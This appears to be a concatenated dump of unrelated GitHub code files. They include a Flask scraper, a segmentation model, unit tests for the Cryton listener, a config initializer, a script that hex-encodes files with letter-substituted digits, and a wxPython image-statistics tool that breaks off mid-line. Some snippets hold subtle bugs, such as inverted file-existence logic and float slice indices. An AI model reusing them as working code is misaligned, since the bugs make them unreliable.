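# within Manhattan distance 2 without an 'X' partition blocking the path.
def keeps_distance(place):
    for r in range(5):
        for c in range(5):
            if place[r][c] != 'P':
                continue
            q = deque([(r, c, 0)])
            seen = {(r, c)}
            while q:
                x, y, d = q.popleft()
                if d == 2:          # never look farther than two steps
                    continue
                for nx, ny in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)):
                    if 0 <= nx < 5 and 0 <= ny < 5 and (nx, ny) not in seen \
                            and place[nx][ny] != 'X':
                        if place[nx][ny] == 'P':
                            return False
                        seen.add((nx, ny))
                        q.append((nx, ny, d + 1))
    return True


print(keeps_distance(["POOOP", "OXXOX", "OPXPX", "OOXOX", "POXXP"]))  # True
```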
get_cookie(file):\n return CookieWork.readFile(file)\n\n # outdated, takes in old format of headers\n def get_headers2(file):\n headers = {}\n with open(file) as f:\n\n for line in f:\n # if line.count(':') > 1:\n # line = line.replace(':', '', 1)\n trying = line.split(' ')\n if trying[0].count(':') > 1:\n line = line.replace(':', '', 1)\n\n line = (line.strip('\\n'))\n line = line.split(':', 1)\n line[1] = line[1].strip(' ')\n headers[line[0]] = line[1]\n\n return headers\n","repo_name":"joshbeyerr/webformat","sub_path":"cookiework.py","file_name":"cookiework.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"30884835873","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\n\n\n# Create an instance of Flask\napp = Flask(__name__)\n\n\n# Use PyMongo to establish Mongo connection\nmongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_hw\")\n\n\n\n@app.route('/')\ndef home():\n\n\n # Find one record of data from the mongo database\n destination_data = mongo.db.collection.find_one()\n\n # Return template and data\n return render_template(\"index.html\", listings=destination_data)\n\n\n@app.route(\"/scrape\")\ndef scrape():\n\n\t#Store the return value in Mongo as a Python dictionary.\n\n\t# Run the scrape function\n mars_data = scrape_mars.scrape_info()\n\n # Update the Mongo database using update and upsert=True\n mongo.db.collection.update({}, mars_data, upsert=True) #This will push to the mongodb. \n #The update function will update if the collection does not exist or it will overwrite it\n\n # Redirect back to home page\n return redirect(\"/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Bandelero/web-scraping-challenge","sub_path":"Mission_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17842481085","text":"import segmentation_models as sm\nimport config as cfg\nimport numpy as np\n\nclass Food_Segmentation_model():\n\n def __init__(self):\n \n self.model = sm.Unet(cfg.seg_model['BACKBONE'], classes=cfg.seg_model['classes'], activation=cfg.seg_model['activation'], encoder_weights=None)\n self.model.load_weights(cfg.seg_model['pretrain-path'])\n\n def predict(self, img):\n y_pred = self.model.predict(np.reshape(img, (1,256,256,3)))\n y_pred = y_pred.squeeze()\n y_pred = y_pred.argmax(axis=2)\n \n return y_pred\n\n def decode_segmap(self, image, nc=7):\n \n label_colors = np.array([(0, 0, 0), # 0=background black\n # 1=rice white, 2=meat brown, 3=egg yellow, 4=vegetable green, 5=beverage blue,6=etc purple\n (255, 255, 255), (153, 76, 0), (255, 255, 0), (102, 255, 102), (0, 0, 255), (255, 102, 255)])\n\n r = np.zeros_like(image).astype(np.uint8)\n g = np.zeros_like(image).astype(np.uint8)\n b = np.zeros_like(image).astype(np.uint8)\n \n for l in range(0, nc):\n idx = image == l\n r[idx] = label_colors[l, 0]\n g[idx] = label_colors[l, 1]\n b[idx] = label_colors[l, 2]\n \n rgb = np.stack([r, g, b], axis=2)\n return rgb","repo_name":"drive087/food_segmentation_API","sub_path":"segmentation_model.py","file_name":"segmentation_model.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"73700827418","text":"import sys\nimport os\n\n#USAGE: FIRST ARG INPUT FILENAME, 
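formatCookie() in the record above re-implements header parsing by hand; the standard library's http.cookies covers the same ground, including quoted values. A sketch:

```python
from http.cookies import SimpleCookie

# Stdlib alternative to formatCookie(): SimpleCookie splits a Cookie header
# into name -> value pairs and unquotes quoted values for free.
raw = 'sessionid=abc123; csrftoken=tok456; theme="dark mode"'
jar = SimpleCookie()
jar.load(raw)
print({name: morsel.value for name, morsel in jar.items()})
# {'sessionid': 'abc123', 'csrftoken': 'tok456', 'theme': 'dark mode'}
```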
ALL ZIP FILES WILL BE INSTALLED AFTER UNPACK. ZIP FILE MUST BE NAMED SAME AS THE DIR\ninputFile = sys.argv[1]\nprint('Running: ')\nhexdumpcommand = 'xxd --plain ' + inputFile + ' > tempr.txt'\nos.system(hexdumpcommand)\nfile = open('tempr.txt', 'r')\ndata = file.read()\nclean_data = data.replace('\\n', '')\nfile.close()\nstringg = clean_data.replace('5', 'g').replace('4', 'h').replace('3', 'i').replace('2', 'j').replace('1', 'k').replace('0', 'l').replace('9', 'm').replace('8', 'n').replace('7', 'o').replace('6', 'p')\nexten = inputFile.split('.')\nextend = exten[1]\nprint('Saving: ')\nfileout = str(exten[0]) + '_' + extend + '.DAT'\nwith open(fileout, 'a') as f: f.write(stringg)\nos.system('rm tempr.txt')\nprint('Done: ')\n","repo_name":"crapIBuilt/DAT_file_package_setup","sub_path":"packer.py","file_name":"packer.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3177782227","text":"from yaml import dump, load, BaseLoader, loader\nfrom pathlib import Path\nfrom textwrap import dedent\nfrom dataclasses import dataclass, field\nfrom dataclasses_json import dataclass_json\nimport multihash\nimport json\nfrom dacite import from_dict\nimport sqlite3\nimport sys\n\n\ndir_path = Path.home() / \".gnize\"\nconfig_path = dir_path / \"config.yaml\"\n\n\n@dataclass_json\n@dataclass\nclass Editor:\n use: str\n mode: str\n\n\n@dataclass_json\n@dataclass\nclass CanvasSource:\n use: str\n path: str\n\n\n@dataclass_json\n@dataclass\nclass FingerprintStore:\n use: str\n connect: str\n\n\n@dataclass_json\n@dataclass\nclass Alternation:\n primary: str\n secondary: str\n\n\n@dataclass_json\n@dataclass\nclass Colors:\n gaps: Alternation\n signals: Alternation\n\n\n@dataclass_json\n@dataclass\nclass Runtime:\n debug_log: str\n debug_obj: str\n\n\n@dataclass_json\n@dataclass\nclass Config:\n editor: Editor\n canvasses: CanvasSource\n fingerprints: FingerprintStore\n colors: Colors\n runtime: Runtime\n\n\ndefault_config = from_dict(\n data_class=Config,\n data={\n \"editor\": {\"use\": \"prompttoolkit\", \"mode\": \"vi\"},\n \"canvasses\": {\"use\": \"filesystem\", \"path\": str(dir_path / \"canvasses\")},\n \"fingerprints\": {\n \"use\": \"sqlite3\",\n \"connect\": str(dir_path / \"fingerprints.db\"),\n },\n \"colors\": {\n \"gaps\": {\"primary\": \"#b58900\", \"secondary\": \"#cb4b16\"},\n \"signals\": {\"primary\": \"#2aa198\", \"secondary\": \"#7c81d4\"},\n },\n \"runtime\": {\n \"debug_log\": \"./.gnize.debug.log\",\n \"debug_obj\": \"./.gnize.debug.json\",\n },\n },\n)\n\n\ndef make_or_get():\n \"\"\"\n If the user doesn't have a .gnize dir in their home directory, initialize it\n Otherwise just provide a config summary and return the contents of config.yaml\n \"\"\"\n\n # ~/.gnize\n if not dir_path.exists():\n print(f\"creating {dir_path}\", file=sys.stderr)\n dir_path.mkdir(exist_ok=True, parents=True)\n print(f\"{dir_path} exists\", file=sys.stderr)\n\n # ~/.gnize/config.yaml\n try:\n with open(config_path, \"w\") as f:\n\n config_str = dump(json.loads(default_config.to_json()))\n\n # the json conversion above can be dispensed with, like so:\n # config_str = dump(default_config)\n\n # but then you end up with yaml like this:\n #\n # !!python/object:gnize.dotdir.Config\n # canvasses: !!python/object:gnize.dotdir.CanvasSource\n # path: /home/matt/.gnize/canvasses\n # use: filesystem\n\n f.write(config_str)\n print(f\"{config_path} already exists\", file=sys.stderr)\n config = default_config\n\n except 
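The xxd round-trip in packer.py (shell out, write tempr.txt, read it back, strip newlines) can stay in-process: bytes.hex() yields exactly the newline-free plain dump the script reconstructs with replace('\n', ''). A sketch; the input path here is hypothetical:

```python
from pathlib import Path

# In-process version of the `xxd --plain` + tempr.txt round-trip: read the
# bytes and hex-encode directly. bytes.hex() is already newline-free.
data = Path('example.bin').read_bytes()   # hypothetical input file
hex_text = data.hex()
Path('example_bin.DAT').write_text(hex_text)
```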
FileNotFoundError:\n with open(config_path, \"r\") as f:\n config_str = f.read()\n print(\"wrote {config_path}\", file=sys.stderr)\n config = load(config_str, Loader=BaseLoader)\n\n # canvasses\n if config.canvasses.use == \"filesystem\":\n canvas_dir = Path(config.canvasses.path)\n canvas_dir.mkdir(parents=True, exist_ok=True)\n count = 0\n for child in canvas_dir.glob(\"*\"):\n if multihash.is_valid(str(child)):\n count += 1\n print(f\"{count} canvasses found in f{canvas_dir}\", file=sys.stderr)\n\n # fingerprints database\n if config.fingerprints.use == \"sqlite3\":\n conn = sqlite3.connect(config.fingerprints.connect)\n cursor = conn.cursor()\n cursor.execute(\n dedent(\n \"\"\"\n CREATE TABLE IF NOT EXISTS prints (\n channel INTEGER NOT NULL,\n fingerprint INTEGER NOT NULL,\n repeat_num INTEGER NOT NULL DEFAULT 0,\n canvas_hash TEXT NOT NULL,\n canvas sub INTEGER NOT NULL,\n sub_idx INTEGER NOT NULL,\n len INTEGER NOT NULL,\n PRIMARY KEY (channel, fingerprint, repeat_num)\n );\n \"\"\"\n )\n )\n cursor.execute(\"SELECT count(*) from prints;\")\n count = cursor.fetchone()[0]\n cursor.execute(\"SELECT count(distinct canvas_hash) from prints;\")\n count = cursor.fetchone()[0]\n print(f\"{count} fingerprints cognized so far\", file=sys.stderr)\n\n return config\n","repo_name":"MatrixManAtYrService/gnize","sub_path":"gnize/dotdir.py","file_name":"dotdir.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22935248372","text":"from django.test import TestCase\nfrom cryton.lib.services import listener\nfrom cryton.lib.models import stage, step, plan, run, worker, event\nfrom cryton.lib.util import logger, states\nfrom mock import patch, Mock\nimport os\nimport uuid\nimport threading\nimport time\nfrom model_bakery import baker\nfrom cryton.cryton_rest_api.models import (\n CorrelationEvent\n)\nimport json\n\n\ndef run_null(*kwargs):\n return 0\n\n\nmock_exc = Mock()\nmock_exc.start.side_effect = run_null\n\ndevnull = open(os.devnull, 'w')\n\nqueue_name = uuid.uuid4().hex\n\n\n@patch('cryton.lib.util.logger.logger', logger.structlog.getLogger('cryton-debug'))\n@patch(\"sys.stdout\", devnull)\n@patch('amqpstorm.Connection', Mock())\nclass ProcessListenerTest(TestCase):\n\n @patch('cryton.lib.util.util.rabbit_connection')\n def setUp(self, mock_rabbit_connection):\n self.proce_list_obj = listener.ProcessListener(queue_name, run_null)\n channel = Mock()\n channel.start_consuming.return_value = 42\n mock_rabbit_connection.return_value = channel\n\n self.proce_list_obj._create_connection()\n\n def tearDown(self) -> None:\n self.proce_list_obj.stop()\n\n def test_start(self):\n t = threading.Thread(target=self.proce_list_obj.start)\n t.start()\n\n self.assertFalse(self.proce_list_obj._stopped.is_set())\n\n def test_create_connection(self):\n self.assertFalse(self.proce_list_obj._stopped.is_set())\n\n def test_stop(self):\n self.assertFalse(self.proce_list_obj._stopped.is_set())\n self.proce_list_obj.stop()\n self.assertTrue(self.proce_list_obj._stopped.is_set())\n\n @patch('cryton.lib.services.listener.Thread')\n def test_execute_custom_callback(self, mock_thread):\n mock_cc = Mock()\n\n self.proce_list_obj._custom_callback = mock_cc\n self.proce_list_obj._execute_custom_callback(message='42')\n mock_thread.assert_called_with(target=mock_cc, args=('42',))\n\n def test_custom_callback(self):\n mock_cc = Mock()\n mock_msg = Mock()\n\n self.proce_list_obj.callback_executable = mock_cc\n 
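In make_or_get() above, opening with mode 'w' creates (and truncates) the file, so the FileNotFoundError branch is not a reliable "config already exists" test, and the two log messages end up attached to the wrong branches. The conventional shape of create-if-missing is an explicit existence check; a sketch of that pattern, not the project's code:

```python
from pathlib import Path

# Create-if-missing for a config file: an explicit existence check, since
# opening with mode 'w' always creates/truncates and therefore cannot signal
# "already exists" via an exception.
def make_or_get_config(path: Path, default_text: str) -> str:
    if path.exists():
        return path.read_text()
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(default_text)
    return default_text
```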
self.proce_list_obj._custom_callback(mock_msg)\n mock_cc.assert_called_with(mock_msg)\n\n\n@patch('cryton.lib.util.logger.logger', logger.structlog.getLogger('cryton-debug'))\n@patch(\"sys.stdout\", devnull)\n@patch('amqpstorm.Connection', Mock())\nclass ListenerTest(TestCase):\n\n @patch('cryton.lib.services.listener.SchedulerService')\n def setUp(self, mock_ss):\n self.listener_obj = listener.Listener()\n\n @patch('cryton.lib.services.listener.Listener._create_process_for_queue', Mock())\n @patch('time.sleep')\n def test_start(self, mock_sleep: Mock):\n self.assertFalse(self.listener_obj._stopped.is_set())\n t = threading.Thread(target=self.listener_obj.start)\n mock_sleep.assert_not_called()\n t.start()\n called = False\n\n # wait until thread comes to time.sleep\n for i in range(10):\n try:\n mock_sleep.assert_called()\n called = True\n break\n except AssertionError:\n time.sleep(0.1)\n pass\n if not called:\n raise AssertionError(\"Expected 'sleep' to have been called.\")\n self.assertFalse(self.listener_obj._stopped.is_set())\n self.listener_obj.stop()\n self.assertTrue(self.listener_obj._stopped.is_set())\n\n @patch('cryton.lib.services.listener.Listener._create_process_for_queue', Mock())\n @patch('time.sleep')\n def test_stop(self, mock_sleep: Mock):\n t = threading.Thread(target=self.listener_obj.start)\n mock_sleep.assert_not_called()\n t.start()\n try:\n self.assertFalse(self.listener_obj._stopped.is_set())\n self.listener_obj.stop()\n self.assertTrue(self.listener_obj._stopped.is_set())\n except:\n pass\n else:\n t.join()\n\n @patch('cryton.lib.util.util.rabbit_connection', Mock())\n def test_create_process_for_queue(self):\n callback = Mock()\n self.assertEqual(len(self.listener_obj._listeners.keys()), 0)\n self.listener_obj._create_process_for_queue(queue_name, callback)\n self.assertEqual(len(self.listener_obj._listeners.keys()), 1)\n\n @patch('cryton.lib.util.util.rabbit_send_oneway_msg')\n def test_handle_paused(self, mock_send_msg):\n\n stage_ex_obj = baker.make(stage.StageExecutionModel, state='PAUSING')\n step_obj = baker.make(step.StepModel)\n\n def set_state(*args, **kwargs):\n stage_ex_obj.state = 'PAUSED'\n\n mock_send_msg.side_effect = set_state\n\n step_exec_stats = {\n 'step_model_id': step_obj.id,\n 'stage_execution': stage_ex_obj\n }\n\n step_exec_obj = step.StepExecution(**step_exec_stats)\n\n self.listener_obj.handle_paused(step_exec_obj)\n self.assertEqual(stage_ex_obj.state, 'PAUSED')\n\n def test_get_correlation_event(self):\n correlation_id = uuid.uuid4().hex\n cor_event = baker.make(CorrelationEvent, correlation_id=correlation_id)\n ret = self.listener_obj.get_correlation_event(correlation_id)\n\n self.assertEqual(ret, cor_event)\n\n @patch('cryton.lib.models.step.StepExecution.execute_successors')\n @patch('cryton.lib.models.step.StepExecution.ignore_successors')\n @patch('cryton.lib.models.step.StepExecution.postprocess')\n def test_step_resp_callback(self, mock_post: Mock,\n mock_ignore: Mock,\n mock_execute: Mock):\n correlation_id = uuid.uuid4().hex\n run_obj = baker.make(run.RunModel)\n worker_obj = baker.make(worker.WorkerModel)\n plan_ex_obj = plan.PlanExecution(plan_model_id=baker.make(plan.PlanModel).id,\n run_id=run_obj.id,\n worker_id=worker_obj.id)\n stage_execution = baker.make(stage.StageExecutionModel, plan_execution=plan_ex_obj.model)\n\n step_obj = baker.make(step.StepModel)\n step_exec_stats = {\n 'step_model_id': step_obj.id,\n 'stage_execution': stage_execution\n }\n\n step_exec_stats_obj = step.StepExecution(**step_exec_stats)\n 
cor_event = baker.make(CorrelationEvent,\n correlation_id=correlation_id,\n step_execution_id=step_exec_stats_obj.model.id)\n\n message = Mock()\n message.correlation_id = correlation_id\n message.body = json.dumps({'test': 1})\n\n plan_ex_obj.state = states.RUNNING\n plan_ex_obj.state = states.PAUSING\n plan_ex_obj.model.save()\n\n stage_execution.state = states.RUNNING\n stage_execution.state = states.PAUSING\n stage_execution.save()\n\n step_exec_stats_obj.state = states.RUNNING\n # step_exec_stats_obj.state = states.PAUSING\n step_exec_stats_obj.model.save()\n\n patch('cryton.lib.models.plan.PlanExecution', Mock(return_value=plan_ex_obj))\n\n c1 = CorrelationEvent.objects.get(id=cor_event.id)\n self.listener_obj.step_resp_callback(message)\n with self.assertRaises(CorrelationEvent.DoesNotExist):\n c2 = CorrelationEvent.objects.get(id=cor_event.id)\n\n mock_post.assert_called_with(json.loads(message.body))\n mock_ignore.assert_called_once()\n mock_execute.assert_not_called()\n\n plan_ex_obj.state = states.PAUSED\n plan_ex_obj.state = states.RUNNING\n plan_ex_obj.model.save()\n patch('cryton.lib.models.plan.PlanExecution', Mock(return_value=plan_ex_obj))\n baker.make(CorrelationEvent,\n correlation_id=correlation_id,\n step_execution_id=step_exec_stats_obj.model.id)\n self.listener_obj.step_resp_callback(message)\n mock_execute.assert_called_once()\n\n @patch('cryton.lib.models.event.process_control_event', Mock(return_value=42))\n @patch('cryton.lib.util.util.send_response')\n def test_control_resp_callback(self, mock_send_response: Mock):\n correlation_id = uuid.uuid4().hex\n\n baker.make(CorrelationEvent,\n correlation_id=correlation_id)\n\n message = Mock()\n message.correlation_id = correlation_id\n message.body = json.dumps({\n 'event_t': 'TYPE',\n 'event_v': 'VALUE'\n })\n self.listener_obj.control_resp_callback(message)\n\n mock_send_response.assert_called_with(message, json.dumps({\"return_value\": 42}))\n\n @patch('cryton.lib.models.event.process_control_request', Mock(return_value=42))\n @patch('cryton.lib.util.util.send_response')\n def test_control_req_callback(self, mock_send_response: Mock):\n correlation_id = uuid.uuid4().hex\n\n baker.make(CorrelationEvent,\n correlation_id=correlation_id)\n\n message = Mock()\n message.correlation_id = correlation_id\n message.body = json.dumps({'test': 1})\n\n self.listener_obj.control_req_callback(message)\n mock_send_response.assert_called_with(message, json.dumps({\"return_value\": 42}))\n\n @patch('cryton.lib.models.event.process_event')\n def test_event_callback(self, mock_process_event: Mock):\n message = Mock()\n message.body = json.dumps({\n 'event_t': 'TYPE',\n 'event_v': 'VALUE'\n })\n\n self.listener_obj.event_callback(message)\n\n mock_process_event.assert_called_with(event.Event('TYPE', 'VALUE'))\n\n @patch('cryton.lib.models.stage.StageExecution.trigger', Mock())\n def test_handle_finished(self):\n worker_obj = baker.make(worker.WorkerModel)\n plan_model_obj = plan.Plan()\n run_obj = run.Run(plan_model_id=plan_model_obj.model.id,\n workers_list=[worker_obj])\n plan_ex_obj = plan.PlanExecution(plan_execution_id=run_obj.model.plan_executions.all()[0].id)\n plan_ex_obj.state = states.RUNNING\n run_obj.state = states.RUNNING\n stage_ex_obj = stage.StageExecution(plan_execution=plan_ex_obj.model,\n stage_model=baker.make(stage.StageModel))\n stage_ex_obj.state = states.SCHEDULED\n stage_ex_obj.state = states.RUNNING\n\n step_ex_obj = step.StepExecution(stage_execution=stage_ex_obj.model,\n 
step_model=baker.make(step.StepModel))\n step_ex_obj.state = states.RUNNING\n step_ex_obj.state = states.FINISHED\n with self.assertLogs('cryton-debug', level='INFO') as cm:\n self.listener_obj.handle_finished(step_ex_obj)\n\n self.assertEqual(len(cm.output), 3)\n self.assertIn(\"stagexecution finished\", cm.output[0])\n self.assertIn(\"planexecution finished\", cm.output[1])\n self.assertIn(\"run finished\", cm.output[2])\n\n self.assertEqual(stage_ex_obj.state, states.FINISHED)\n self.assertEqual(plan_ex_obj.state, states.FINISHED)\n self.assertEqual(run_obj.state, states.FINISHED)\n","repo_name":"slashsec-edu/cryton-core","sub_path":"tests/unit_tests/test_listener.py","file_name":"test_listener.py","file_ext":"py","file_size_in_byte":11049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27105482862","text":"#!/usr/local/bin/python\n\nimport wx\nfrom PIL import Image\nfrom PIL import ImageStat\nimport numpy\n\n# Global variables\n\nclass imageStat(wx.Frame):\n\tdef __init__(self, parent):\n\t\t# build a frame\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, \"Image Statistics Calculator\", size = (700, 220), style=wx.DEFAULT_FRAME_STYLE ^ wx.RESIZE_BORDER)\n\n\t\t# build a panel\n\t\tmainPanel = wx.Panel(self, wx.ID_ANY)\n\n\t\t# build a status bar =================================================================\n\t\tstatusBar = self.CreateStatusBar()\n\n\t\t# build a menu bar ===================================================================\n\t\tmenuBar = wx.MenuBar()\n\t\tself.SetMenuBar(menuBar)\n\n\t\t# build buttons for selecting files ==================================================\n\t\topenButton = wx.Button(mainPanel, id=wx.ID_ANY, label = \"Open...\", pos=(595, 5), size=(90,-1))\n\t\topenButton.Bind(wx.EVT_BUTTON, self.FileSelect)\n\n\t\t# build a text control for file display ==============================================\n\t\tself.fileDisplay = wx.TextCtrl(mainPanel, value = \"File name\", pos=(10,10), size=(580,-1))\n\t\t\n\t\t# build a text control for roi =======================================================\n\t\twx.StaticText(mainPanel, -1, \"X ROI size\", (210, 40), (70,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"Y ROI size\", (385, 40), (70,-1), wx.ALIGN_RIGHT)\n\t\tself.xroiDisplay = wx.TextCtrl(mainPanel, value = \"200\", pos=(285, 40), size = (90,-1))\n\t\tself.yroiDisplay = wx.TextCtrl(mainPanel, value = \"200\", pos=(460, 40), size = (90,-1))\n\t\t\n\n\t\t# build a text control for avg/std display ===========================================\n\t\twx.StaticText(mainPanel, -1, \"Average\", (80, 90), (70,-1), wx.ALIGN_CENTER)\n\t\twx.StaticText(mainPanel, -1, \"Std Dev\", (80, 120), (70,-1), wx.ALIGN_CENTER)\t\t\n\t\twx.StaticText(mainPanel, -1, \"All\", (150,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"B\", (260,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"Gb\", (370,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"Gr\", (480,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"R\", (590,70), (100,-1), wx.ALIGN_RIGHT)\n\n\t\tself.avgDisplay = wx.TextCtrl(mainPanel, value = \"\", pos=(150, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayB = wx.TextCtrl(mainPanel, value = \"\", pos=(260, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayGb = wx.TextCtrl(mainPanel, value = \"\", pos=(370, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayGr = wx.TextCtrl(mainPanel, value = \"\", 
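The listener tests above lean on two idioms: patching out time.sleep so the suite does not stall, and asserting on Mock call records. Both in isolation, as a minimal sketch:

```python
import time
from unittest.mock import Mock, patch

# Patch a collaborator, drive the code under test, assert the interaction.
def wait_and_send(transport, payload):
    time.sleep(60)            # would stall a real test run
    transport.send(payload)


with patch('time.sleep') as mock_sleep:   # neutralized, as in the tests above
    transport = Mock()
    wait_and_send(transport, {'event': 'finished'})
    mock_sleep.assert_called_once_with(60)
    transport.send.assert_called_once_with({'event': 'finished'})
print('ok')
```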
pos=(480, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayR = wx.TextCtrl(mainPanel, value = \"\", pos=(590, 90), size=(100,-1), style=wx.TE_READONLY)\n\n\t\tself.stdDisplay = wx.TextCtrl(mainPanel, value = \"\", pos=(150, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayB = wx.TextCtrl(mainPanel, value = \"\", pos=(260, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayGb = wx.TextCtrl(mainPanel, value = \"\", pos=(370, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayGr = wx.TextCtrl(mainPanel, value = \"\", pos=(480, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayR = wx.TextCtrl(mainPanel, value = \"\", pos=(590, 120), size=(100,-1), style=wx.TE_READONLY)\n\n\t\t# build a text control for status display ============================================\n\t\tself.statusText = wx.TextCtrl(mainPanel, value = \"\", pos=(10, 150), size=(680,-1), style=wx.TE_READONLY)\n\n\t\t# build a button for reading in the image and processing =============================\n\t\tcalcButton = wx.Button(mainPanel, id=wx.ID_ANY, label = \"Calculate\", pos=(5, 35), size=(90,-1))\n\t\tcalcButton.Bind(wx.EVT_BUTTON, self.Calculate)\n\n\t\t# build a button for displaying image ================================================\n\t\tdispButton = wx.Button(mainPanel, id=wx.ID_ANY, label = \"Display\", pos=(105, 35), size=(90,-1))\n\t\tdispButton.Bind(wx.EVT_BUTTON, self.Display)\n\n\t# define callbacks\n\t# ========================================================================================\n\t\n\n\t# function for closing window\n\tdef CloseWindow(self, event):\n\t\tself.Destroy()\n\t\n\t# function for file selection\n\tdef FileSelect(self, event):\n\t\tfileDialog = wx.FileDialog(None, \"Select a bmp file\", \"\", \"\", \"BMP files (*.bmp)|*.bmp\", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)\n\n\t\t# user canceled file opening\n\t\tif fileDialog.ShowModal() == wx.ID_CANCEL:\n\t\t\treturn\n\t\t\t \n\t\t# otherwise, proceed loading the file chosen by the user\n\t\tself.fileName = fileDialog.GetPath()\n\t\tself.fileDisplay.Clear()\n\t\tself.fileDisplay.AppendText(self.fileName)\n\t\tself.avgDisplay.Clear()\n\t\tself.avgDisplayB.Clear()\n\t\tself.avgDisplayGb.Clear()\n\t\tself.avgDisplayGr.Clear()\n\t\tself.avgDisplayR.Clear()\n\t\tself.stdDisplay.Clear()\n\t\tself.stdDisplayB.Clear()\n\t\tself.stdDisplayGb.Clear()\n\t\tself.stdDisplayGr.Clear()\n\t\tself.stdDisplayR.Clear()\n\n\t# function for reading and calculating\n\tdef Calculate(self, event):\n\t\ttry:\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Processing...\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\t\t\n\t\t\t# try reading the file\n\t\t\tself.im = Image.open(self.fileDisplay.GetValue())\n\t\t\twidth, height = self.im.size\n\n\t\t\t# attempt to fetch x roi data\n\t\t\ttry:\n\t\t\t\tself.xroi = int(self.xroiDisplay.GetValue())\n\t\t\t\t# check for out of bounds conditions\n\t\t\t\tif self.xroi > width:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: x ROI out of bounds, max x = \" + str(width) + \", max y = \" + str(height))\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\t\t# check to make sure greater than 0\n\t\t\t\tif self.xroi < 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be greater than 0\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\t\n\t\t\t\t# check to make sure it is even\n\t\t\t\tif self.xroi % 2 == 1:\n\t\t\t\t\t#throw 
error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be even\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\n\t\t\texcept ValueError:\n\t\t\t\t#throw error\n\t\t\t\tself.statusText.SetValue(\"Error: please enter integer ROI value\")\n\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\treturn\n\t\t\t# attempt to fetch y roi data\n\t\t\ttry:\n\t\t\t\tself.yroi = int(self.yroiDisplay.GetValue())\n\t\t\t\t# check for out of bounds conditions\n\t\t\t\tif self.yroi > height:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: y ROI out of bounds, max x = \" + str(width) + \", max y = \" + str(height))\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\t\t# check to make sure greater than 0\n\t\t\t\tif self.yroi < 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be greater than 0\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\t\t# check to make sure it is even\n\t\t\t\tif self.yroi % 2 == 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be even\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\texcept ValueError:\n\t\t\t\t#throw error\n\t\t\t\tself.statusText.SetValue(\"Error: please enter integer ROI value\")\n\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\treturn\n\n\t\t\t# convert into matrices\t\t\t\n\t\t\tself.mat = numpy.array(self.im)\n\t\t\t# apply roi\n\t\t\tself.mat = self.mat[height/2 - self.yroi/2:height/2 + self.yroi/2, width/2 - self.xroi/2:width/2 + self.xroi/2, 0]\n\t\t\t# get each channel\n\t\t\tself.bmat = self.mat[0:self.yroi:2, 0:self.xroi:2]\n\t\t\tself.gbmat = self.mat[0:self.yroi:2, 1:self.xroi:2]\n\t\t\tself.grmat = self.mat[1:self.yroi:2, 0:self.xroi:2]\n\t\t\tself.rmat = self.mat[1:self.yroi:2, 1:self.xroi:2]\n\t\n\t\t\t# calculate and display mean\n\t\t\tself.avgDisplay.Clear()\n\t\t\tself.avgDisplay.AppendText(str(numpy.around(numpy.mean(self.mat), 